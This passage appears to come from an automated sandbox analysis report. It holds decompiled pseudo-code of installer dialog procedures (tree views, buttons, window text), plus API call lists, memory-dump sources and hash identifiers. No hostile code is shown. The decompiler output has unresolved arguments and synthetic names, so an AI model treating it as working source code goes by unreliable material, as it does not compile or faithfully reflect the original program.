              				signed char _t252;
              				signed char _t260;
              				void* _t265;
              				void* _t267;
              				signed char* _t285;
              				signed char _t286;
              				long _t291;
              				void* _t298;
              				signed int* _t299;
              				int _t300;
              				long _t301;
              				int _t303;
              				long _t304;
              				int _t305;
              				signed int _t306;
              				signed int _t309;
              				signed int _t316;
              				signed char* _t324;
              				int _t329;
              				void* _t331;
              
              				_v12 = GetDlgItem(_a4, 0x3f9);
              				_t191 = GetDlgItem(_a4, 0x408);
              				_t298 =  *0x42a2a8;
              				_t331 = SendMessageW;
              				_v8 = _t191;
              				_v36 = _t298;
              				_v24 =  *0x42a274 + 0x94;
              				if(_a8 != 0x110) {
              					L23:
              					if(_a8 != 0x405) {
              						_t307 = _a16;
              					} else {
              						_a12 = 0;
              						_t307 = 1;
              						_a8 = 0x40f;
              						_a16 = 1;
              					}
              					if(_a8 == 0x4e || _a8 == 0x413) {
              						_v16 = _t307;
              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t307 + 4)) == 0x408) {
              							if(( *0x42a27d & 0x00000002) != 0) {
              								L41:
              								if(_v16 != 0) {
              									_t242 = _v16;
              									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe3d) {
              										SendMessageW(_v8, 0x419, 0,  *(_t242 + 0x5c));
              									}
              									_t243 = _v16;
              									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe39) {
              										_t244 =  *(_t243 + 0x5c);
              										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
              											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) & 0xffffffdf;
              										} else {
              											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) | 0x00000020;
              										}
              									}
              								}
              								goto L48;
              							}
              							if(_a8 == 0x413) {
              								L33:
              								_t307 = 0 | _a8 != 0x00000413;
              								_t249 = E00404E4D(_v8, _a8 != 0x413);
              								_v20 = _t249;
              								if(_t249 >= 0) {
              									_t100 = _t298 + 8; // 0x8
              									_t307 = _t249 * 0x818 + _t100;
              									_t251 =  *_t307;
              									if((_t251 & 0x00000010) == 0) {
              										if((_t251 & 0x00000040) == 0) {
              											_t252 = _t251 ^ 0x00000001;
              										} else {
              											_t260 = _t251 ^ 0x00000080;
              											if(_t260 >= 0) {
              												_t252 = _t260 & 0x000000fe;
              											} else {
              												_t252 = _t260 | 0x00000001;
              											}
              										}
              										 *_t307 = _t252;
              										E0040117D(_v20);
              										_a8 = 0x40f;
              										_a12 = _v20 + 1;
              										_a16 =  !( *0x42a27c) >> 0x00000008 & 0x00000001;
              									}
              								}
              								goto L41;
              							}
              							_t307 = _a16;
              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
              								goto L41;
              							}
              							goto L33;
              						} else {
              							goto L48;
              						}
              					} else {
              						L48:
              						if(_a8 != 0x111) {
              							L56:
              							if(_a8 == 0x200) {
              								SendMessageW(_v8, 0x200, 0, 0);
              							}
              							if(_a8 == 0x40b) {
              								_t230 =  *0x42372c;
              								if(_t230 != 0) {
              									ImageList_Destroy(_t230);
              								}
              								_t231 =  *0x423740;
              								if(_t231 != 0) {
              									GlobalFree(_t231);
              								}
              								 *0x42372c = 0;
              								 *0x423740 = 0;
              								 *0x42a2e0 = 0;
              							}
              							if(_a8 != 0x40f) {
              								L90:
              								if(_a8 == 0x420 && ( *0x42a27d & 0x00000001) != 0) {
              									_t329 = (0 | _a16 == 0x00000020) << 3;
              									ShowWindow(_v8, _t329);
              									ShowWindow(GetDlgItem(_a4, 0x3fe), _t329);
              								}
              								goto L93;
              							} else {
              								E004011EF(_t307, 0, 0);
              								_t203 = _a12;
              								if(_t203 != 0) {
              									if(_t203 != 0xffffffff) {
              										_t203 = _t203 - 1;
              									}
              									_push(_t203);
              									_push(8);
              									E00404ECD();
              								}
              								if(_a16 == 0) {
              									L75:
              									E004011EF(_t307, 0, 0);
              									_v36 =  *0x423740;
              									_t206 =  *0x42a2a8;
              									_v64 = 0xf030;
              									_v20 = 0;
              									if( *0x42a2ac <= 0) {
              										L86:
              										if( *0x42a26c == 4) {
              											InvalidateRect(_v8, 0, 1);
              										}
              										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
              											E00404E08(0x3ff, 0xfffffffb, E00404E20(5));
              										}
              										goto L90;
              									}
              									_t299 = _t206 + 8;
              									do {
              										_t212 =  *((intOrPtr*)(_v36 + _v20 * 4));
              										if(_t212 != 0) {
              											_t309 =  *_t299;
              											_v72 = _t212;
              											_v76 = 8;
              											if((_t309 & 0x00000001) != 0) {
              												_v76 = 9;
              												_v60 =  &(_t299[4]);
              												_t299[0] = _t299[0] & 0x000000fe;
              											}
              											if((_t309 & 0x00000040) == 0) {
              												_t216 = (_t309 & 0x00000001) + 1;
              												if((_t309 & 0x00000010) != 0) {
              													_t216 = _t216 + 3;
              												}
              											} else {
              												_t216 = 3;
              											}
              											_v68 = (_t216 << 0x0000000b | _t309 & 0x00000008) + (_t216 << 0x0000000b | _t309 & 0x00000008) | _t309 & 0x00000020;
              											SendMessageW(_v8, 0x1102, (_t309 >> 0x00000005 & 0x00000001) + 1, _v72);
              											SendMessageW(_v8, 0x113f, 0,  &_v76);
              										}
              										_v20 = _v20 + 1;
              										_t299 =  &(_t299[0x206]);
              									} while (_v20 <  *0x42a2ac);
              									goto L86;
              								} else {
              									_t300 = E004012E2( *0x423740);
              									E00401299(_t300);
              									_t227 = 0;
              									_t307 = 0;
              									if(_t300 <= 0) {
              										L74:
              										SendMessageW(_v12, 0x14e, _t307, 0);
              										_a16 = _t300;
              										_a8 = 0x420;
              										goto L75;
              									} else {
              										goto L71;
              									}
              									do {
              										L71:
              										if( *((intOrPtr*)(_v24 + _t227 * 4)) != 0) {
              											_t307 = _t307 + 1;
              										}
              										_t227 = _t227 + 1;
              									} while (_t227 < _t300);
              									goto L74;
              								}
              							}
              						}
              						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
              							goto L93;
              						} else {
              							_t237 = SendMessageW(_v12, 0x147, 0, 0);
              							if(_t237 == 0xffffffff) {
              								goto L93;
              							}
              							_t301 = SendMessageW(_v12, 0x150, _t237, 0);
              							if(_t301 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t301 * 4)) == 0) {
              								_t301 = 0x20;
              							}
              							E00401299(_t301);
              							SendMessageW(_a4, 0x420, 0, _t301);
              							_a12 = _a12 | 0xffffffff;
              							_a16 = 0;
              							_a8 = 0x40f;
              							goto L56;
              						}
              					}
              				} else {
              					 *0x42a2e0 = _a4;
              					_t303 = 2;
              					_v32 = 0;
              					_v20 = _t303;
              					 *0x423740 = GlobalAlloc(0x40,  *0x42a2ac << 2);
              					_t265 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
              					 *0x423734 =  *0x423734 | 0xffffffff;
              					_v16 = _t265;
              					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E00405518);
              					_t267 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
              					 *0x42372c = _t267;
              					ImageList_AddMasked(_t267, _v16, 0xff00ff);
              					SendMessageW(_v8, 0x1109, _t303,  *0x42372c);
              					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
              						SendMessageW(_v8, 0x111b, 0x10, 0);
              					}
              					DeleteObject(_v16);
              					_t304 = 0;
              					do {
              						_t273 =  *((intOrPtr*)(_v24 + _t304 * 4));
              						if( *((intOrPtr*)(_v24 + _t304 * 4)) != 0) {
              							if(_t304 != 0x20) {
              								_v20 = 0;
              							}
              							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406579(_t304, 0, _t331, 0, _t273)), _t304);
              						}
              						_t304 = _t304 + 1;
              					} while (_t304 < 0x21);
              					_t305 = _a16;
              					_push( *((intOrPtr*)(_t305 + 0x30 + _v20 * 4)));
              					_push(0x15);
              					E00404492(_a4);
              					_push( *((intOrPtr*)(_t305 + 0x34 + _v20 * 4)));
              					_push(0x16);
              					E00404492(_a4);
              					_t306 = 0;
              					_v16 = 0;
              					if( *0x42a2ac <= 0) {
              						L19:
              						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
              						goto L20;
              					} else {
              						_t324 = _v36 + 8;
              						_v28 = _t324;
              						do {
              							_t285 =  &(_t324[0x10]);
              							if( *_t285 != 0) {
              								_v64 = _t285;
              								_t286 =  *_t324;
              								_v88 = _v16;
              								_t316 = 0x20;
              								_v84 = 0xffff0002;
              								_v80 = 0xd;
              								_v68 = _t316;
              								_v44 = _t306;
              								_v72 = _t286 & _t316;
              								if((_t286 & 0x00000002) == 0) {
              									if((_t286 & 0x00000004) == 0) {
              										 *( *0x423740 + _t306 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
              									} else {
              										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
              									}
              								} else {
              									_v80 = 0x4d;
              									_v48 = 1;
              									_t291 = SendMessageW(_v8, 0x1132, 0,  &_v88);
              									_v32 = 1;
              									 *( *0x423740 + _t306 * 4) = _t291;
              									_v16 =  *( *0x423740 + _t306 * 4);
              								}
              							}
              							_t306 = _t306 + 1;
              							_t324 =  &(_v28[0x818]);
              							_v28 = _t324;
              						} while (_t306 <  *0x42a2ac);
              						if(_v32 != 0) {
              							L20:
              							if(_v20 != 0) {
              								E004044C7(_v8);
              								_t298 = _v36;
              								goto L23;
              							} else {
              								ShowWindow(_v12, 5);
              								E004044C7(_v12);
              								L93:
              								return E004044F9(_a8, _a12, _a16);
              							}
              						}
              						goto L19;
              					}
              				}
              			}


              APIs
              • GetDlgItem.USER32 ref: 00404F16
              • GetDlgItem.USER32 ref: 00404F23
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
              • LoadImageW.USER32 ref: 00404F86
              • SetWindowLongW.USER32 ref: 00404FA0
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
              • DeleteObject.GDI32(00000110), ref: 00405000
              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
              • GetWindowLongW.USER32(?,000000F0), ref: 00405144
              • SetWindowLongW.USER32 ref: 00405152
              • ShowWindow.USER32(?,00000005), ref: 00405162
              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
              • ImageList_Destroy.COMCTL32(?), ref: 00405336
              • GlobalFree.KERNEL32 ref: 00405346
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
              • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
              • ShowWindow.USER32(?,00000000), ref: 004054EF
              • GetDlgItem.USER32 ref: 004054FA
              • ShowWindow.USER32(00000000), ref: 00405501
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 2564846305-813528018
              • Opcode ID: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
              • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
              • Opcode Fuzzy Hash: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
              • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E00403FB9(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
              				struct HWND__* _v32;
              				void* _v80;
              				void* _v84;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t37;
              				signed int _t39;
              				signed int _t41;
              				struct HWND__* _t51;
              				signed int _t70;
              				struct HWND__* _t76;
              				signed int _t89;
              				struct HWND__* _t94;
              				signed int _t102;
              				int _t106;
              				signed int _t118;
              				signed int _t119;
              				int _t120;
              				signed int _t125;
              				struct HWND__* _t128;
              				struct HWND__* _t129;
              				int _t130;
              				long _t133;
              				int _t135;
              				int _t136;
              				void* _t137;
              
              				_t118 = _a8;
              				if(_t118 == 0x110 || _t118 == 0x408) {
              					_t37 = _a12;
              					_t128 = _a4;
              					__eflags = _t118 - 0x110;
              					 *0x423730 = _t37;
              					if(_t118 == 0x110) {
              						 *0x42a268 = _t128;
              						 *0x423744 = GetDlgItem(_t128, 1);
              						_t94 = GetDlgItem(_t128, 2);
              						_push(0xffffffff);
              						_push(0x1c);
              						 *0x421710 = _t94;
              						E00404492(_t128);
              						SetClassLongW(_t128, 0xfffffff2,  *0x429248);
              						 *0x42922c = E0040140B(4);
              						_t37 = 1;
              						__eflags = 1;
              						 *0x423730 = 1;
              					}
              					_t125 =  *0x40a39c; // 0xffffffff
              					_t136 = 0;
              					_t133 = (_t125 << 6) +  *0x42a2a0;
              					__eflags = _t125;
              					if(_t125 < 0) {
              						L34:
              						E004044DE(0x40b);
              						while(1) {
              							_t39 =  *0x423730;
              							 *0x40a39c =  *0x40a39c + _t39;
              							_t133 = _t133 + (_t39 << 6);
              							_t41 =  *0x40a39c; // 0xffffffff
              							__eflags = _t41 -  *0x42a2a4;
              							if(_t41 ==  *0x42a2a4) {
              								E0040140B(1);
              							}
              							__eflags =  *0x42922c - _t136;
              							if( *0x42922c != _t136) {
              								break;
              							}
              							__eflags =  *0x40a39c -  *0x42a2a4; // 0xffffffff
              							if(__eflags >= 0) {
              								break;
              							}
              							_t119 =  *(_t133 + 0x14);
              							E00406579(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
              							_push( *((intOrPtr*)(_t133 + 0x20)));
              							_push(0xfffffc19);
              							E00404492(_t128);
              							_push( *((intOrPtr*)(_t133 + 0x1c)));
              							_push(0xfffffc1b);
              							E00404492(_t128);
              							_push( *((intOrPtr*)(_t133 + 0x28)));
              							_push(0xfffffc1a);
              							E00404492(_t128);
              							_t51 = GetDlgItem(_t128, 3);
              							__eflags =  *0x42a30c - _t136;
              							_v32 = _t51;
              							if( *0x42a30c != _t136) {
              								_t119 = _t119 & 0x0000fefd | 0x00000004;
              								__eflags = _t119;
              							}
              							ShowWindow(_t51, _t119 & 0x00000008);
              							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100);
              							E004044B4(_t119 & 0x00000002);
              							_t120 = _t119 & 0x00000004;
              							EnableWindow( *0x421710, _t120);
              							__eflags = _t120 - _t136;
              							if(_t120 == _t136) {
              								_push(1);
              							} else {
              								_push(_t136);
              							}
              							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
              							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
              							__eflags =  *0x42a30c - _t136;
              							if( *0x42a30c == _t136) {
              								_push( *0x423744);
              							} else {
              								SendMessageW(_t128, 0x401, 2, _t136);
              								_push( *0x421710);
              							}
              							E004044C7();
              							E0040653C(0x423748, E00403F9A());
              							E00406579(0x423748, _t128, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
              							SetWindowTextW(_t128, 0x423748);
              							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
              							__eflags = _t70;
              							if(_t70 != 0) {
              								continue;
              							} else {
              								__eflags =  *_t133 - _t136;
              								if( *_t133 == _t136) {
              									continue;
              								}
              								__eflags =  *(_t133 + 4) - 5;
              								if( *(_t133 + 4) != 5) {
              									DestroyWindow( *0x429238);
              									 *0x422720 = _t133;
              									__eflags =  *_t133 - _t136;
              									if( *_t133 <= _t136) {
              										goto L58;
              									}
              									_t76 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
              									__eflags = _t76 - _t136;
              									 *0x429238 = _t76;
              									if(_t76 == _t136) {
              										goto L58;
              									}
              									_push( *((intOrPtr*)(_t133 + 0x2c)));
              									_push(6);
              									E00404492(_t76);
              									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
              									ScreenToClient(_t128, _t137 + 0x10);
              									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
              									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
              									__eflags =  *0x42922c - _t136;
              									if( *0x42922c != _t136) {
              										goto L61;
              									}
              									ShowWindow( *0x429238, 8);
              									E004044DE(0x405);
              									goto L58;
              								}
              								__eflags =  *0x42a30c - _t136;
              								if( *0x42a30c != _t136) {
              									goto L61;
              								}
              								__eflags =  *0x42a300 - _t136;
              								if( *0x42a300 != _t136) {
              									continue;
              								}
              								goto L61;
              							}
              						}
              						DestroyWindow( *0x429238);
              						 *0x42a268 = _t136;
              						EndDialog(_t128,  *0x421f18);
              						goto L58;
              					} else {
              						__eflags = _t37 - 1;
              						if(_t37 != 1) {
              							L33:
              							__eflags =  *_t133 - _t136;
              							if( *_t133 == _t136) {
              								goto L61;
              							}
              							goto L34;
              						}
              						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
              						__eflags = _t89;
              						if(_t89 == 0) {
              							goto L33;
              						}
              						SendMessageW( *0x429238, 0x40f, 0, 1);
              						__eflags =  *0x42922c;
              						return 0 |  *0x42922c == 0x00000000;
              					}
              				} else {
              					_t128 = _a4;
              					_t136 = 0;
              					if(_t118 == 0x47) {
              						SetWindowPos( *0x423728, _t128, 0, 0, 0, 0, 0x13);
              					}
              					if(_t118 == 5) {
              						asm("sbb eax, eax");
              						ShowWindow( *0x423728,  ~(_a12 - 1) & _t118);
              					}
              					if(_t118 != 0x40d) {
              						__eflags = _t118 - 0x11;
              						if(_t118 != 0x11) {
              							__eflags = _t118 - 0x111;
              							if(_t118 != 0x111) {
              								L26:
              								return E004044F9(_t118, _a12, _a16);
              							}
              							_t135 = _a12 & 0x0000ffff;
              							_t129 = GetDlgItem(_t128, _t135);
              							__eflags = _t129 - _t136;
              							if(_t129 == _t136) {
              								L13:
              								__eflags = _t135 - 1;
              								if(_t135 != 1) {
              									__eflags = _t135 - 3;
              									if(_t135 != 3) {
              										_t130 = 2;
              										__eflags = _t135 - _t130;
              										if(_t135 != _t130) {
              											L25:
              											SendMessageW( *0x429238, 0x111, _a12, _a16);
              											goto L26;
              										}
              										__eflags =  *0x42a30c - _t136;
              										if( *0x42a30c == _t136) {
              											_t102 = E0040140B(3);
              											__eflags = _t102;
              											if(_t102 != 0) {
              												goto L26;
              											}
              											 *0x421f18 = 1;
              											L21:
              											_push(0x78);
              											L22:
              											E0040446B();
              											goto L26;
              										}
              										E0040140B(_t130);
              										 *0x421f18 = _t130;
              										goto L21;
              									}
              									__eflags =  *0x40a39c - _t136; // 0xffffffff
              									if(__eflags <= 0) {
              										goto L25;
              									}
              									_push(0xffffffff);
              									goto L22;
              								}
              								_push(_t135);
              								goto L22;
              							}
              							SendMessageW(_t129, 0xf3, _t136, _t136);
              							_t106 = IsWindowEnabled(_t129);
              							__eflags = _t106;
              							if(_t106 == 0) {
              								goto L61;
              							}
              							goto L13;
              						}
              						SetWindowLongW(_t128, _t136, _t136);
              						return 1;
              					} else {
              						DestroyWindow( *0x429238);
              						 *0x429238 = _a12;
              						L58:
              						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
              							ShowWindow(_t128, 0xa);
              							 *0x425748 = 1;
              						}
              						L61:
              						return 0;
              					}
              				}
              			}


              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
              • ShowWindow.USER32(?), ref: 00404012
              • DestroyWindow.USER32 ref: 00404026
              • SetWindowLongW.USER32 ref: 00404042
              • GetDlgItem.USER32 ref: 00404063
              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
              • IsWindowEnabled.USER32(00000000), ref: 0040407E
              • GetDlgItem.USER32 ref: 0040412C
              • GetDlgItem.USER32 ref: 00404136
              • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
              • GetDlgItem.USER32 ref: 00404247
              • ShowWindow.USER32(00000000,?), ref: 00404268
              • EnableWindow.USER32(?,?), ref: 0040427A
              • EnableWindow.USER32(?,?), ref: 00404295
              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
              • EnableMenuItem.USER32 ref: 004042B2
              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
              • SetWindowTextW.USER32(?,00423748), ref: 0040431B
              • ShowWindow.USER32(?,0000000A), ref: 0040444F
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
              • String ID: H7B
              • API String ID: 184305955-2300413410
              • Opcode ID: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
              • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
              • Opcode Fuzzy Hash: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
              • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E00404651(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
              				intOrPtr _v8;
              				int _v12;
              				void* _v16;
              				struct HWND__* _t56;
              				signed int _t75;
              				signed short* _t76;
              				signed short* _t78;
              				long _t92;
              				int _t103;
              				signed int _t110;
              				intOrPtr _t113;
              				WCHAR* _t114;
              				signed int* _t116;
              				WCHAR* _t117;
              				struct HWND__* _t118;
              
              				if(_a8 != 0x110) {
              					if(_a8 != 0x111) {
              						L13:
              						if(_a8 != 0x4e) {
              							if(_a8 == 0x40b) {
              								 *0x421714 =  *0x421714 + 1;
              							}
              							L27:
              							_t114 = _a16;
              							L28:
              							return E004044F9(_a8, _a12, _t114);
              						}
              						_t56 = GetDlgItem(_a4, 0x3e8);
              						_t114 = _a16;
              						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
              							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
              							_t113 =  *((intOrPtr*)(_t114 + 0x18));
              							_v12 = _t103;
              							_v16 = _t113;
              							_v8 = 0x428200;
              							if(_t103 - _t113 < 0x800) {
              								SendMessageW(_t56, 0x44b, 0,  &_v16);
              								SetCursor(LoadCursorW(0, 0x7f02));
              								_push(1);
              								E00404900(_a4, _v8);
              								SetCursor(LoadCursorW(0, 0x7f00));
              								_t114 = _a16;
              							}
              						}
              						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
              							goto L28;
              						} else {
              							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
              								SendMessageW( *0x42a268, 0x111, 1, 0);
              							}
              							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
              								SendMessageW( *0x42a268, 0x10, 0, 0);
              							}
              							return 1;
              						}
              					}
              					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
              						goto L27;
              					} else {
              						_t116 =  *0x422720 + 0x14;
              						if(( *_t116 & 0x00000020) == 0) {
              							goto L27;
              						}
              						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
              						E004044B4(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
              						E004048DC();
              						goto L13;
              					}
              				}
              				_t117 = _a16;
              				_t75 =  *(_t117 + 0x30);
              				if(_t75 < 0) {
              					_t75 =  *( *0x42923c - 4 + _t75 * 4);
              				}
              				_t76 =  *0x42a2b8 + _t75 * 2;
              				_t110 =  *_t76 & 0x0000ffff;
              				_a8 = _t110;
              				_t78 =  &(_t76[1]);
              				_a16 = _t78;
              				_v16 = _t78;
              				_v12 = 0;
              				_v8 = E00404602;
              				if(_t110 != 2) {
              					_v8 = E004045C8;
              				}
              				_push( *((intOrPtr*)(_t117 + 0x34)));
              				_push(0x22);
              				E00404492(_a4);
              				_push( *((intOrPtr*)(_t117 + 0x38)));
              				_push(0x23);
              				E00404492(_a4);
              				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
              				E004044B4( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
              				_t118 = GetDlgItem(_a4, 0x3e8);
              				E004044C7(_t118);
              				SendMessageW(_t118, 0x45b, 1, 0);
              				_t92 =  *( *0x42a274 + 0x68);
              				if(_t92 < 0) {
              					_t92 = GetSysColor( ~_t92);
              				}
              				SendMessageW(_t118, 0x443, 0, _t92);
              				SendMessageW(_t118, 0x445, 0, 0x4010000);
              				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
              				 *0x421714 = 0;
              				SendMessageW(_t118, 0x449, _a8,  &_v16);
              				 *0x421714 = 0;
              				return 0;
              			}


              APIs
              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
              • GetDlgItem.USER32 ref: 00404703
              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
              • GetSysColor.USER32(?), ref: 00404731
              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
              • lstrlenW.KERNEL32(?), ref: 00404752
              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
              • GetDlgItem.USER32 ref: 004047CD
              • SendMessageW.USER32(00000000), ref: 004047D4
              • GetDlgItem.USER32 ref: 004047FF
              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
              • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
              • SetCursor.USER32(00000000), ref: 00404853
              • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
              • SetCursor.USER32(00000000), ref: 0040486F
              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
